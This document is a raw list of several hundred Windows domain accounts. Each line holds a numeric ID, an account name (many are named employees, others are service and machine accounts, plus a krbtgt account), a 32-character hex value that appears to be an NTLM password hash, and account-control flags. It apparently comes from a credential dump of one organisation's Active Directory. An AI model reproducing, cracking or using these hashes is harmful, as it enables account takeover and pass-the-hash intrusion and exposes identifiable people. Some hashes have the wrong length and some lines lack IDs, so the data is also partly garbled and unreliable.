13964 IWAM_FS-0027 9a2f40bb9ff1e39133e61b289a175ea 66048
19501 SVC-DCHIAPG001 cb26b90b52d067d83acfc65c2a3b4c0f 66048
4425 WS-0005 5281901e3711eaed959498ec917c2899 66050
19566 NLB-WEB01 b61901c0ca1611bb197131cd56943faf 66048
18841 RIVERBED 85ad7a16dda051d635ac3821b15a8271 16843264
13424 SP_Guest e6d9170e90f4a7e6f21280ed3c0517d1 66048
20202 SVC-RENDERFARM f62c5ee137914dd9ee56e91190121002 66048
17077 SP_FARM2 8cad7030797f2f44f72788f7f8a6b1f4 66048
13505 SP_GuestACS f2d438a9fe97ee2eaad900e0dd2c63b1 66048
15469 SQL-RPTSCHPHN a9bed826519203d82a8ae1c1432b1486 66048
18828 sh-0003$ cd40fb78af6248e3544a4a4af7478e0d 4096
20253 SVC-SPBACKUP c311b011bfc2f32edab6c95c0caf6fa3 66048
19564 SVC-DCHIAPG001-APP01 da15412388a03c8ac31dfcce8afd09b8 66048
20279 PCHIWSG009$ e52deef2201a59ed99dc0db24eb4b82f 4096
20733 PCHIWSG008$ 18daa9eebc41709766da594298307a07 4096
13502 SQL-vCenterAdmin a1940aad3133f4f21d61c22435b9fb65 66048
17002 SP_FARM 8cad7030797f2f44f72788f7f8a6b1f4 66048
12460 DCDHCP 68a80609b1306f1e3add3f5b0c9ff181 66048
16747 SSRSTengRpt 8c1542d97d9b79b79b48c06e1c07b07a232 66048
7721 EQLOANER 53f7c8703df697d350750a011e2fe088 66048
6310 SECMON 6b23cfaefade6334400928e42b6e2b5c 66048
16807 SQL-IRoARpt ee5ffe7df654e6904ab88711d8d94c78 66048
4316 Tririga Admin f3229ad17598f5bcd0b272d7670d8eb5 66050
20794 SVC-SQL0005ToDMZSQL d77025566bfab9149fd7b2124675677f 66048
20281 SQL-DeltekToTengRO 5cec88ff3d9b6fb93510849984b6f452 514
3076 DILBERTXX 54229da8f8d221fc1aeb94f04d61ecc1 66048
19237 SVC-DCHIDBG001 8512ff5982fcd48d9ea4e717e225cd91 66048
21794 SPTestUser 6364271e1a2232e42ecb3406eeb8f823 512
19529 PCHIAPG004 3c7ea1911b9f90f57889716ef346e1c3 512
18080 WS-0007 68a80609b1306f1e3add3f5b0c9ff181 514
18748 VSSQL0003 90655ec9fe04e0b27291e5da2c0013b7 514
17857 VSSQL0002 7059bd4edfb8547c89108945313e7be4 514
19530 PCHIWSG003 7be11b959ab976ca7472f96d1b2560fb 514
19522 PCHIWSG002 6dfd7e3370334bd0744c9accd5c1061a 514
19521 PCHIWSG001 ad63cfb46defee50ed6b3dbb3b394ac1 514
21234 PCHIDCG002 21795387c0638972a387d8780383fa0d 514
19516 PCHIAPG003 69e793f4f0cdfb4cfe22a4f8ecdde1b2 514
19523 PCHIAPG002 559b2d5277ca59a70c1a839e6224ab59 514
12699 SP_IIS_APP01 076408f8e718dad08ad94a5e5019f762 514
12700 SP_IIS_APP_USACE 076408f8e718dad08ad94a5e5019f762 514
17193 sp_ACSgc 09f18ad0dfb95eece617c5cb6a6578ce 514
13116 ftbenningg1 e5ccb8571d2d2ff5323cc5012439b4e7 514
13504 _SP-ACS 076408f8e718dad08ad94a5e5019f762 66050
19707 sp_pmacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050
13514 _SP_IRoA 076408f8e718dad08ad94a5e5019f762 66050
19708 sp_imacs fb3f42647b2dc1dc1fc3650cfbbcf9ed4 66050
13576 sp_clientacs f2d438a9fe97ee2eaad900e0dd2c63b1 514
13123 _SP FtBenning 076408f8e718dad08ad94a5e5019f762 66050
13105 SP_SEARCH_SRV 076408f8e718dad08ad94a5e5019f762 66048
13400 sa-sharepointdba 076408f8e718dad08ad94a5e5019f762 66048
21245 SVC-CDR-CallLogDrop 65848727f354af155f640c7b978ccc6f 66048
15524 SQL-AppAuction a8641e863021a0097288225e2c3225ae 66048
19914 SVC-IROA-SP-IROA2DB ba8b91f6c6b4a57196b5f98dec0239b6 66048
18902 DCHIAPG001 eb8162e99613ee77d748ebef863beb97 66050
18903 PCHIAPG001 b1cd050101dc230f5c379b6a1edbe00f 66048
19742 SVC-ZENOSS 6e9d7f9b4eabc311d8fe548ccaf3827b 66048
20063 PCHIAPG002$ acf70e009b52f487059320b52dd8c415 4096
7353 CMICSUPPORT 24e07a99097e95374e2ba0fae7716c15 514
1975 EXCRES e28c2ffc7b411f62a01089a7d746c088 514
21785 LT-900223 bf89f60275e8e1e1b6ef9750d04da952 66048
34794 exmerge 757d1c465d04ef58ba57fd699f92b97c 512
22079 Terry.Thompson e491d1b24f392f21ce9a38070555bc3d 66050
33887 SP2013content 7b2784302223746c3ab288de4f44fb82 66048
33890 SP2013superreader ef18fad8d8c04de6b98191c55c228f87 66048
33883 SP2013install 505e41852a2bc9a2cf8dfeccee93ed08 66048
33891 SP2013sqlinstall d20c68065f87178df8f204838dcc3ad4 66048
34822 SCOMreader d44a4e4513964adca599356bed8a663e 66048
34825 SCOMwriter 12951f364679fe127dcca1369ea37101 66048
34812 SCOMdb 8e6d2e3f01be9ab7c510fb6960a734e5 66048
34835 pfink 9dc4be7322f4e85d97f8cd6d0a5e898d 66050
21233 krbtgt_29044 3f84d34fdca0041f3892f60692b2ebc9 514
15274 FS-0056 67dbfb53036906e36170593182eb7990 66048
13944 FW-0015 2c50e78ba2f50b0b8a83cd9b0757fb71 66048
13013 DEXTERRA ccc6930692ded0b8694ca5438d71081e 514
34734 splunk-test 174009eab65310987c9f0a53e0d2baca 514
37324 Jeff.Roemer 6131349933cb5fc2f2d65ee3bd57d295 514
37325 Zach.Gardner 5988814a367010a477b94e0f07b1e0f3 514
37326 Mark.Dvorak aecc10cfeb546d6fcebf6171e1ed99ba 514
37351 Steve.Dalo 37ac503d0e481716d218c2a6e74cce1b 514
36513 Bob.Jeffers 8ec39ee848b3dba7c1c0cc9fb650f906 514
36227 Raymond.Lowman 6e564b6f12b7feda82b04582fe65842f 514
37668 Duanne.Mclaine e82d29c0dfb2ad3d18dce800cd4cf390 514
22090 Loblaws 93b0ef17748fc3f0c228a298ce520e31 66050
20227 PCHIAPG008$ 488f797b3dcead9be0a6121b63ca6c0a 4096
33755 John.Williams a863beff0611411e77a091f169f2163f 514
22062 Mauro.Crestani 8c0219b11dcc34266444df1aa4c78d64 514
34332 Kathy.Ng 2aa01ad1babd992e685a997645e46e9f 514
37332 Todd.Hill 1ffbcdafa9d05573fdd2e0854633172a 514
34330 Chad.Groshart 2aa01ad1babd992e685a997645e46e9f 514
34331 Lee.Simon 2aa01ad1babd992e685a997645e46e9f 514
35872 Catherine.Leskowat d048edb521fd72258ede9f4bbcb58d2 514
36525 Randy.Baccadutre fd111572adcc65e3d7bd4f284386b473 514
35817 Brad.Daniel 7e239559ff9da984f62f429c35943f46a 514
34333 Peter.Ellis 07759524c6fe35b1fb9227afd35a2bbd 514
36205 Christina.McAlhaney d90e2ee11481a93453c8bdf53b667f8f 514
36522 Grace.Spear d84339a30ab9777b2a9b8265bc11b5ef 514
36511 Greg.Wys d84339a30ab9777b2a9b8265bc11b5ef 514
36510 Dennis.McNeil d84339a30ab9777b2a9b8265bc11b5ef 514
36509 Brian.Donnelly d84339a30ab9777b2a9b8265bc11b5ef 514
36512 Peter.Schreiber d84339a30ab9777b2a9b8265bc11b5ef 514
36209 Philip.Kerrigan 22b54f16e554f9cc50fca8990a621af2 514
34336 Ken.Neuhauser ea30d8683ffe121232568a7990c16066 514
34335 Chris.Schumacher 7324dee82144e76bcb64107fbfecffa7 514
34334 Alex.Lukachko 2aa01ad1babd992e685a997645e46e9f 514
22010 Christine.Brazill dcf1598abf0d61b14aa2c24a39e4f42a 514
21856 Daniel.Goodman cffcadaf230a1ba16972933f4ed8a9a37 66050
22013 DJ.Bailey dcf1598abf0d61b14aa2c24a39e4f42a 514
33769 Melinda.Fitter a1f97b707ceeb397aa667655180fdaee 514
22080 Richard.Eber 08844bb002c6fe66315e6e6e693efbb07 66050
37362 Bryan.Johnson 760712966d90ecf2ad3e341b354442b5 514
37363 Debra.Cohen 23997056a7dddf659383c3c769dbe579 514
37361 Jason.Popovic 55139ce93d8fc92fa3b0c1d33d530fa2 514
37364 Lauren.Martin 1429bbfdb4c18e80281ac488b8067b4e 514
36968 Bob.Beringer 88f525992fb5f7cc19c57a2fa86591e8 514
36969 Will.Pullen d27a63d44b2d08d1e64ef9c8ff0d0c07 514
36977 Tony.Puckett 85331a04a1942ecfbe71f4e65457f462 514
37244 Woodrow.Simms db2d316409094252cbab1030f1085a90 514
22124 Kathy.Weise 6364271e1a2232e42ecb3406eeb8f823 514
36228 Melody.Thomas b60e068b7a0cc33fb101d731dc0c97 514
21848 Ariz.Masters e774a9021f7fb9408c587688fc83d102 66050
21855 Jake.Carlile 00ae862ed0e75a057e61f0e0288907ad 66050
21957 Ryan.Reu 32ac246a362471660a42ea7ef29b5b68 514
33744 Matt.Hamrick 8ec39ee848b3dba7c1c0cc9fb650f906 514
33742 Jamie.Setter 2aa01ad1babd992e685a997645e46e9f 514
21894 Theresa.Bridges 434f2ce607a0b358588ca562ce973bd6 66050
21296 Siva.Haran fe81eca7d279885792038756911c4bf0 514
36230 Parviz.Mahdavi 990b6b0c2f6cc8e9e4e1e64bb2d9081e 514
22169 Samuel.Alexander 188d0a4fe11344f4a7de2922e85ad762 514
37202 Zach.Neill 6fd9968ade6bb14f41004f334e0d2b1d 514
37040 Dick.Westrum fca7da4aa0f7ccdf315f8d4427844edd 514
36260 Michael.Bechtel 4f31dd7b47de4a64e8630eaa90bfff70 514
22146 Shannon.Parish cbb79b2fcfebacc3e3574f770a5d693a 514
33740 CalhounG 388cf9d9b3e302582fa7283ced787c77 66050
22171 Dawn.Austin b1eacb7a902f4a284597923ca0f46bfb 514
36224 Christina.Longbrake fdb56c6d2e5c63c544c11eff76dff87a 514
22170 James.Allen d2c66eef5e131b86998db5e0c2d07d19 514
36404 Matthew.Morris 2aa01ad1babd992e685a997645e46e9f 514
36402 Robert.Rugala 2aa01ad1babd992e685a997645e46e9f 514
36633 Michelle.Coghill 889d8b42a0afa88b47ee35993c25a578 514
37177 Tony.Rhein 0f5390bc3feca271d6495027956461f8 514
36213 Erik.Caylor 2aa01ad1babd992e685a997645e46e9f 514
36638 Jason.Schaffer 8ec39ee848b3dba7c1c0cc9fb650f906 514
37042 Fang.Li 13572a57e90ebe6a1970d36f1cd0ea55 514
22778 Tom.Lohner b60e068b7a0cc33febb101d731dc0c97 514
22077 Dave.Shreve 989b8f7d98643ef14c225350b9bbe792 514
36211 Robert.Rodrigues a071fdf94847e8cd2da25ebe89ceeada 514
22109 Jordan.Ehrig e414b39ab33c981a7e1c2cdfad97a68f 514
36527 James.Mierke 2c5b3e4e5b8564019245b74023ac39 514
36210 Jess.Cathcart f10cfa6ca0574cd41156d71123e81a47 514
36463 Richard.Poirier 9194da895682192b9ba99820840f1c50f 514
36232 John.Fabian 31796c39959f8a19933ccf8cdcfb5e77 514
22110 Russell.Laquey ce5f35539b189d06c867f70e268d0492 514
33741 EddyD 282f47af71f7d5585343f7d916991509 66050
22059 Justin.Sartler 4485e8c30594aaeb6f8d9fd743f1fb88 514
22039 Anthony.Herrera 5cbbafa3aa2fa9e4e0831be74a4c42e8 514
22076 Eric.Doan ed6a2f9660991407ec5d215be6232050 514
22040 Soledad.Angeles 5cbbafa3aa2fa9e4e0831be74a4c42e8 514
36226 Stephen.Holicky 2aa01ad1babd992e685a997645e46e9f 514
36466 Terry.Malloy 8ec39ee848b3dba7c1c0cc9fb650f906 514
36403 Terrence.Malloy 2aa01ad1babd992e685a997645e46e9f 514
22168 Chris.Beckman 014a91e14bed8e3231fb6c9aad77100d 514
22160 Joseph.DiGuglielmo 59f3f9675dbbc4fd677f296664430a19 514
22167 Christopher.Zwicky 2aa01ad1babd992e685a997645e46e9f 514
21958 Nicolae.Dumitru 7f4ca153e5ebb021f180d76395f0e8ba 514
36629 Terry.Lackey 8ec39ee848b3dba7c1c0cc9fb650f906 514
36609 Jarrod.Cafaro faf1ffe186f89d6f211a831fbc9f642c 514
37350 Lauren.Young f30438fac4dd0556896448b6ef2babc7 514
36630 Andrew.Robertson f62b2e3f42926e2e2a5cd9cc940ba1c83 514
33751 Keith.Mueller d77cf4d5c3115e01e89f24cd8fa0f8d5 514
37450 Kyle.Williams 7c0413d4334c73bc404e88c8d1c676e4 514
21851 Julia.Maschek 20016d2585577b8144dcd8487a9ffc9c 514
36212 Anthony.Oplawski 312b75bf538ee3cf8cbc7453ae7a3f76 514
21974 Terry.McDonnell f3461c36556bf320e57b3cbc50e3f4b3 514
21898 Stephanie.Coad 6fd117a11f0fae1e0f14c5edf2c4e16d 514
36636 James.Grice 8ec39ee848b3dba7c1c0cc9fb650f906 514
36635 Jonathan.Pearson 8ec39ee848b3dba7c1c0cc9fb650f906 514
37365 Zack.Gordon f1b996d44a60a2aa7b18008ae64df6e9 514
37366 Kinan.Hayani c8ffcead279dd48bd3f5e2f6ff0dfb3d 514
37367 Michael.Nettesheim 14101484112ba3322b5fadd92b494ad2 514
36971 Brian.Poyant f7a5ece47465203cae2a5c7a3363a582 514
Carl.Mankinen e4fa8721cd627408ab561ee7bdc3a8c8 514
36970 Rick.Nohmer fdc91a227a032e37717a8b2c2bfc91e6 514
36998 Kip.Paxton 7ce1e7f38bfb6582356623bcf135f5a9 514
36999 Jill.Poyant 816aba31601cba700b237e72f50f2883 514
36669 Randy.Webb 6a7cfdd4f82f2c84b862903bf63ee763 514
36670 Mike.Herrin f31c0b7c10b8e674378aba53a3a75710 514
36716 John.Yenges cc6d2624d64073e80446c1837e761074 514
22125 Darrell.Oyer fdadcf2f1a529285c5d445f6096bfab9 514
36610 Greg.Baughman 690b638dafc62a2d4f796b2f4d19fd35 514
36972 Reza.Alipanah 3f6ae10e05963bd2c19129f23da87b00 514
36973 Joseph.Alipanah faafb7501c67fe8097c07ac26e556a38 514
36975 Tommy.Gardner 9c42cb6942e1576b9a6dede8580542cc 514
36976 Joe.Wysocki 9c42cb6942e1576b9a6dede8580542cc 514
22176 Bill.Higginson a8d079ee5132707532738accdc15c8f7 514
22175 Glenn.Wilson 2aa01ad1babd992e685a997645e46e9f 514
22179 Zach.Peterson 2aa01ad1babd992e685a997645e46e9f 514
22178 Ashley.Peterson a74f35eb13031e426bb171271b0b4af6 514
22177 David.Affleck f8b29a627c7dcf5ad652a9c5a9ff0fb6 514
22174 Steve.Thomas 2aa01ad1babd992e685a997645e46e9f 514
36529 Cameron.Baillie 56cd5f116dc7f4712a3de43902b1aa2f 514
36530 David.Paoli 56cd5f116dc7f4712a3de43902b1aa2f 514
35867 Rob.Downs 2aa01ad1babd992e685a997645e46e9f 514
36668 Steven.Below 6a7cfdd4f82f2c84b862903bf63ee763 514
36555 Susan.Martin e50022b17de0adcf659a3f322b1e85b8 514
36974 Mike.Beaver e47c5a89bebda342c81d45a9db85f51a 514
37359 Jason.Greenlaw 20e4633610456c807a78fc035487aa30 514
37360 Jill.Trundy f3cbf374df77527ef2e2a7545cc9de34 514
37356 Gregory.Hobbs 4c5e3b88f6370fd813fe14fe14b0af71ea29 514
Martin.Dodd 4e2bd4d1fd28bfaae676c4d79ef2ed32 514
James.Stephenson a6952118b704b00afb9d8a0a7d102b62 514
36257 Eduardo.Obregon 8ec39ee848b3dba7c1c0cc9fb650f906 514
36255 Luis.Perez 2aa01ad1babd992e685a997645e46e9f 514
36258 Irbis.Gallegos 2aa01ad1babd992e685a997645e46e9f 514
37200 Mark.Watson e20b88eed2e169903256bb0421a0ec53 514
39294 SVC-SQL-TaskForcePow 9fb46b91e1ab932d1af23a88cb2ddc91 66048
37738 SophosSAUUSCHI-NET00 d57d4348693351112be0fa9278a4d89b 66048
38593 James.OReilly eb157dd24543080aa80f43eeb3120cfc 514
20234 QMMAD 7a0dc3b652f0bdf99c4b17616a81afca 66050
3190 WS-0002 68f01048eb4a48be9bfaf5907fba8b58 66050
34726 SH-0004 e841e88e29270c01ad6259a01fda98eb 66048
40235 HealthMailbox70e1a8b 922cf34124f2d39d14688a8dfe304e9b 66048
33990 HealthMailboxd742523 37826e702cdfa20af5b34a7bce795959 66048
33991 HealthMailbox40b9f47 f0b4b926cf7f77afeda9f73a9a7d3353 66048
39337 HealthMailbox6203626 20fb5125483e5ea0c0ac15206fed8be9 66048
40237 HealthMailbox0c1cc09 797e8c2a9a0e43ebd03d608a04a569d4 66048
33992 HealthMailbox0c511df 395585ac4500a1d6ff04dde66742ce45 66048
33993 HealthMailboxcc776b8 13c0165f5da8be3bd1938231e68d00f9 66048
39338 HealthMailbox013f4fe 5197cdf66ea1a0b99ce265492c8ef17e 66048
2616 WS-0001$ 61e80728dbe6e3df94e9d9f4b447cf2c 4096
38640 Patrick.Sauerland ce6423d90700388bf86e82acd146f73c 514
36315 Brittany.Charles fe2cd5868df7df9d2836d7c8dbf3906e 514
36628 Brian.Tackett 8ec39ee848b3dba7c1c0cc9fb650f906 514
38422 Nick.Dolan bede8fc9638c3ae7f3097e40e1486ecc 514
36608 Kevin.Coughlin 64823b329d623b877e434ed3bfa8928b 514
36313 Craig.Mertes 02e6be1c4ad3b053b1d550dd1c934440 514
33986 Eduardo.Ceja 7ae821395c515177bd31fab7605ad182 514
33988 Nestor.Cheung d00f233863a63532e682a8ffe4c875e6 514
37669 Jed.Villanueva 098e8cf9c0dd66ad314cc601e0ba95ae 514
33920 Sushil.Kumar b65e1df746b823ee4558a657966fe1b1 514
33970 Ryan.Partelow 90f764c642fbe9275168d4a89d9d5fdb 514
33963 Hiroto.Uehara 954d585d6e1b2ea073b844cce8dfe2a8 514
37328 Melissa.Kiser 8842a3b1c46d245ca50dff760e311858 514
36573 Hanan.Zayed f424219111fc9f1c7f780099f2630f45 514
36528 Robert.Elfering 56cd5f116dc7f4712a3de43902b1aa2f 514
37576 Stephen.Solon 646e7e3a5df7ede12179195888d68db3 66050
21903 PWDCVHH001$ a1c9eadfe10ca8853406da043cac63ad 4096
15241 FS-0054 a5bd29c3aa75f850e81db1765e0db7f0 66048
40267 Will.Gamble de45dc1de8dbc21d224ddc27326f2ca6 514
39452 Nevin.Hedlund 8908f7ef07b75cd9cc8b9d7b6afe1197 514
39457 Lisa.Loftsgaarden c0070235639eb6e5528b8f20374f44b9 514
39454 Peter.Schlosser 8908f7ef07b75cd9cc8b9d7b6afe1197 514
20221 PCHIWSG003$ 867ef793fbea58e64c79e24231d6aac4 4096
19526 PCHIAPG004$ 90c9e14372b392f549a4c038a9f5bde2 4096
15240 FS-0054$ 21e602633427d61c33c755a5dba24e2b 4096
40236 HealthMailbox886a5d9 9be18554742f42d3e5170d75647ec907 66048
37739 USCHI-FSP002$ 16ed7460228fa0c02146ec54bc8b351b 4096
39336 HealthMailbox0f1d320 dc85692eab0c2dc215c2be4a9e9b51bf 66048
33758 David.Carroll 02e6be1c4ad3b053b1d550dd1c934440 514
36634 Max.Donahue 9b955f70969ef289c3d090d6115f53ec 514
38501 Ed.Duarte 02e6be1c4ad3b053b1d550dd1c934440 514
38590 Eric.Eitzen 6f804e9f2d320659fb5ce76a5b284887 514
40231 Akihiro.Yamamoto 7dc20f8af848c3515da349e62ff7a1ba 514
40228 Masao.Tachibana db11c7e89cc185b2f18940c7ad8247fb 514
40230 Isao.Koshida 738628e91d1a0f3276b98064ccc46e29 514
40229 Hiromi.Horie 954d585d6e1b2ea073b844cce8dfe2a8 514
38611 Tetsuo.Hayashi 2e1895e66ec1eb5cb7f9339aec1d57e9 514
38369 Joe.Murphy 946a6b469978e9b7665d9727b5de9d91 514
20133 SophosPureMessage e66cbf538dc42aae34e869cb6a9d6a80 66048
39643 HealthMailbox683009b c7424e4e34590acda308e3bdca255e6c 66048
40367 HealthMailbox2bf9eb5 3a1f8e5bcecd4be773061a6fcfb07b16 66048
18899 Richard.Diddams 42c37a7790419cee11e45bfadf9db5eb 514
20235 QMMEX 7a0dc3b652f0bdf99c4b17616a81afca 66050
15369 IPSENTRY-01$ 661d37f03698ca7567e987680fd33bee 4096
37649 Ethan.Dickenson b09fdec55b856fad310add9483229fb 514
33900 USMAI-FSG001$ ee093ef8bf9e12e0b437954863fd3fd5 4096
33888 SP2013userprofile e5308bd9012d6676d6a23e47ad1c222c 66048
18088 JOURNAL ef39c0015ee354b5b67636c658e8a28b 66048
13782 OOXADMIN a5bd29c3aa75f850e81db1765e0db7f0 66048
34837 USMAI-DCG001$ 21171d1c042eef750ed301b957ad3eb2 4096
37368 Satoshi.Mikami 79a7dcd88b2c38fb0e7c3528805d5939 514
40268 zuser1 b146bac21f72c77332fdf08e08d67e3c 512
40269 zuser2 b146bac21f72c77332fdf08e08d67e3c 512
7651 BEBACKUP 68a80609b1306f1e3add3f5b0c9ff181 66050
21753 DSA 5dd3afc6c55307c5e06b7986e4eb6e88 514
13963 IUSR_FS-0027 1e7e32ccb36f66e7a739382b044e8f6 66050
39544 Richard.Zych 9557ca53d791c1742083f2efc3a32975 514
39543 Michael.Bartos 9557ca53d791c1742083f2efc3a32975 514
39564 Andrew.VanHorn 9557ca53d791c1742083f2efc3a32975 514
39537 Andre.Towner ac175a71d879b6e4fe69b3b2be090c8d 514
34013 Richard.Suazo 3caab67e7519f63af70e6965a79efc54 514
37701 Bob.Stellmack 9557ca53d791c1742083f2efc3a32975 514
21959 Ron.Putlak ac175a71d879b6e4fe69b3b2be090c8d 514
37369 Takashi.Hattori 8b6ad1f99b927f62c8e5cc3bd65495d3 514
38534 Miriam.Betancourt 4e9bbdbdbc20caed4bc935994a2d6fac61 514
21284 PWDCFSG001$ 80da3ddebd99b6573f4b4138b8f3547b 4096
34947 Aaron.Schramm 18ea4714fc4b9dc06f9d5987e0c3645a 514
38321 Jorge.Sanchez 7d373b1d511d274dd853afd0600ad0a2 514
33987 David.Phan cb5fb1b52788249b274e9e83f32578c5 514
36225 Steven.Offringa b9e4ded6b36b47c99207d60cf1e91b37 514
34011 Mark.Obszanski 20d40784e3495f5fd16be79110b58ea0 514
37041 Scott.Henry d655b0e3151f4b7f7875c8d736b9c043 514
34012 Gary.Gosz ccde6a48e06d5131d6f7d91282ef51ec 514
37753 Nate.Gonner c4ebf760bc326da16d2d40b8a3165de3 514
39614 Garret.Forkan 49dc9d79c2a3f39aec7d6cd9de93bd2d 514
37766 Dion.Celebrado 8697132bb28033ab6e2567c4c060f780 514
39587 Adan.Castro e0ab99c7813ba3fa2020f32366a50e77 514
39605 Charles.Braucher bef05ba9dea4d763d77620e51bf33da8 514
39586 Nem.Djorovic 3aeda65bff9484c045b1aca0ee8cb6d2 514
34017 Inna.Markus e3f70d73ae7efc1d4d6614ece7aeca75 514
39339 Elijah.Wilson 517ff1723b54408b5be16f51d98ed762 514
39547 Patrick.Bocaya e16b64756523ec68b4d08da96e66ed07 514
34784 zuser b146bac21f72c77332fdf08e08d67e3c 514
21895 Jon.Miller e24728aeb7089f5bd9b067c665c35f74 514
37728 localadmin 9634d23b54a72dc30bee82e559286864 66050
38373 Curt.Merritt 5e9fe364a7b87330d58152e70c8d37e7 514
36662 Jennifer.Holmes 3aaabefebd0bafab3bf809c1a770eae3 514
37727 LT-000018$ a1ed4fe7686f29cd44ad7febb91ca139 4098
37446 Stacy.Ortiz 935b152f2e43dbe9344b85cb92d815e9 514
34070 Alexander.Karkazis 59b865a9e4aa135155664967a3fb62ba 514
34069 David.Chiconie 86f2c7ae8228a28d3df9a4a0eed552d9 514
38500 Sterling.Yates 9baaa3ec5dc352e22c68fd0c09f7d7b8 514
39585 Brian.Wackerman 3105656bd13a62dfdcc4e0ae269e91a3 514
39326 MININT-KSPEC9U$ ce3b8131ccefe6aba9708fdea964e4 4098
39616 Reid.Wilhelm fc7c666beaf6a8ed0a6a0ee99debd2f1 514
21281 ProjectTesting 062d79436cccb59f71eedfc7d30a4f8d 66048
21280 FTPSAdmin cb896c2290d2bdceaa51027db9348823 66048
20229 SVC-vCenter 3ea865743db06297ea01d9ca41ebc3ba 66048
37374 Masaki.Tanabe 7b5f2987f815ab3c69cde9faafe47366 514
37370 Samson.Sy f2c115b8a70a79a97b14ef203e51dbf9 514
39581 Roger.Reckers 3105656bd13a62dfdcc4e0ae269e91a3 514
37372 Eisaku.Honda 9b0b7003b3d5a985063129307b6035b6 514
37373 Edgar.Domingo 54be16c9af21ca112faa6f6edf706d64 514
37375 Ernesto.Cruz f5b0e9b580a9ec06749528e3076a2a67 514
37286 Brian.Carino 27e14d8b1b083eb6f8b13677dd0e1524 514
36844 Mike.Kampwirth 6bde2d060d3dd07e89ab1aac3f2a4e80 514
34010 Jose.Hernandez 9e74ddb0b54dee70ec7afed42d27f3f9 514
34008 Jon.Haack 9e74ddb0b54dee70ec7afed42d27f3f9 514
34009 Sam.Feller 4e7bc7306f4dded57e3b2de48a7123e2 514
34006 Romy.Espino 9e74ddb0b54dee70ec7afed42d27f3f9 514
33998 Lucas.Barker 9e74ddb0b54dee70ec7afed42d27f3f9 514
33999 Connor.Olberding 2f731f4c9465cc41c4099369d2d6160a 514
37487 Scott.Parkhurst b724bccada5622fdb597568f816836ae 514
19670 PCHIWSG004$ 3bd4459bc4ad749f9d5232eaa4219c9c 4096
20062 PCHIWSG002$ 065731dd4afc71f5b04f7640dece607a 4096
5619 FS-0029$ 604e96ea45dc3f9f4da6ec2d16f5877c 4096
40379 USCHI-WSG003$ 5b304547205120873443686b7310fac1 4096
33826 SVC-SpFarmAD 151ff4d3fd639f6932d84bd06a61db61 66048
22782 Info-Request 8df152f90d9b6d44887d7b3f289eb615 66048
40363 OD 7cae723808d12238a6d0aa770aa52edc 512
36486 USCHI-WSG101$ dc0846879b47b39829d7ebb34edaac49 4096
40470 SiegelH 6d8be855a5f0693361a43261fedcf7b3 514
40380 USCHI-DBG003$ 10b3ee346b2c0c4ecc83282cf09f03f8 4096
14196 FS-0051$ 220f686b803be26f918cb25f177b7261 4096
14197 FS-0051$ 68a80609b1306f1e3add3f5b0c9ff181 66048
22744 PCHIAPG005$ 6d668e9f57b6b3ecf852418aa1ec288b 4096
12568 FS-0044 4cfc1b7e31df9bd5b2bbdff79f63050b 66048
37744 Daniel.Lally fe09eb8b43cbc5f22ee844880e52892a 514
34072 Austin.Johnson 0658577a7c621753d82d7de9883f3ac1 514
39460 Robert.Nelson 994a58d1927a4e3b082091e4f83fb7b1 514
34074 Rob.Stankiewicz 020ba9e0aa5e8293b4df293bf7f46faf 514
38368 Craig.Pitts 5e17e575216e181add82aa61b71cba6e 514
34168 Brian.Sesterhenn 2bd212bbf8bd2b7ae34825a8bb471d24 514
40368 Robert.Judge 22fc5743e0f71979084c1d8e432ec3ae 514
22055 Steve.Citko 7375a54f0074a6704e75114b47107b9e 514
3966 Phil.Wilson b627a5ce7aa7a7c1b139e1becb3ce161 514
39878 Randy.Keel 78205cff50ecc8b94f555ff291cb8754 514
39879 Mark.Jarvis c0cabd93fbb86349c09f7d4e4ae82172 514
7471 WS-0006$ 2f476222cfe31447dfa1b6c295c9bde2 4096
33997 LT-000066$ e54e133cd487e7bfcddbf1471377df3e 4098
34002 Matt.Eagle e10ab818f17f720b600684694f2ec6f8 514
36320 ChenB 35422b292e2863d3aed087087db97464 514
22008 HillT 06bfbec796e0fd5aadeb53c397a9a219 514
34016 Chris.Bove cb9a405a12ce26ac44e6ba93e899e539 514
6798 SCANTO 68a80609b1306f1e3add3f5b0c9ff181 66048
40602 USCHI-PWC001$ 3b754431cf649e6f91cb19c64ed0edae 4096
37752 USCHI-VCH001$ 1a155eaf2fce77d97ea235c7b975cdc3 4096
39822 PhillipsR bd43482b2e3009e39204b6c24453e3bd 514
40982 LT-000022$ 311e7cc83fd4b0ef92ebc5b913684032 4098
12563 FS-0044$ 4ba1e7321582a7ad47fe1d93137ce84d 4096
6796 GRABOWAP 9e96278cd96afad67f0fab1b9e720931 514
33867 FS-0027$ a93ba57ad821601582ef396846f3064e 4096
34856 LT-000040$ 71bd87cea4137d0c2a579ae4b322c6d2 4096
33917 LT-000045$ bd0a2a13a7a29fe90753fd3898c5f0be 4096
39981 LT-000042$ 879dd29c1e0b966b4829c0b935eda38e 4128
33968 LT-000050$ aeb2aa7bb48357ec0bb03922322379 4096
37140 TB-000009$ 4587b229f4927a9b16cbb53fa2d1ae70 4130
39820 TB-000016$ f787feb984291a436c1875b061fc7afa 4098
39997 JohnsT d0c0f866742fc5adecdbd7b2db49acc5 514
37506 TB-000013$ 34ee0886ff22949285aa9a577c65cc91 4098
34848 USCHI-DT006$ c6a385344fae237c9c4a4f5e917cdb1d 4098
22758 DT-000031$ 526d9e9e8401ce413dbf35cbf3c70b0da4 4098
21780 DT-000032$ 2296e9237b468ff1400c782aa6df6468 4098
20730 DT-000029$ f3d95da1159543bec50d5b1400d2474f 4098
15271 DT-000007$ b0d10640c534fae0afe198847a851008 4098
21954 DT-000018$ 2a8d5977e4ec67435db8baa089341773 4098
19664 DT-000020$ ce0f7bcbff9c37abd66c937961cc3c14 4098
19549 DT-000021$ d173ccd63ad96aab6e5b9b92dfc662aa 4098
40579 DT-000023$ 2f97ff262e8d06df57cfe4a298669a51 4098
19683 DT-000027$ c5e1e9e9d9ae8a76f2961d1f3b2ff310 4098
34747 DT-000035$ 8095b6ca7cc3e9d7d6b992dc45c67b47 4098
21846 Sandy.Homola 2a62d5efcbeb54286491b55423e3a347 512
20742 SVC-VMPRO2 38325de5e92def2f2dcca30ee4bd662e 66048
40034 Shelby.Short f63129f0a859daf2311bc82064701544 512
40057 HRER 7cae723808d12238a6d0aa770aa52edc 66048
12562 FS-0043$ 6d4e5a0c50bc6c15e902210a4ee3d245 4096
12567 FS-0043 $0edd65b3dd036ad79635bcfaca838d45 66048
15273 FS-0056$ c2afe9df78f1c22079cfbeb2dd23c2ae 4096
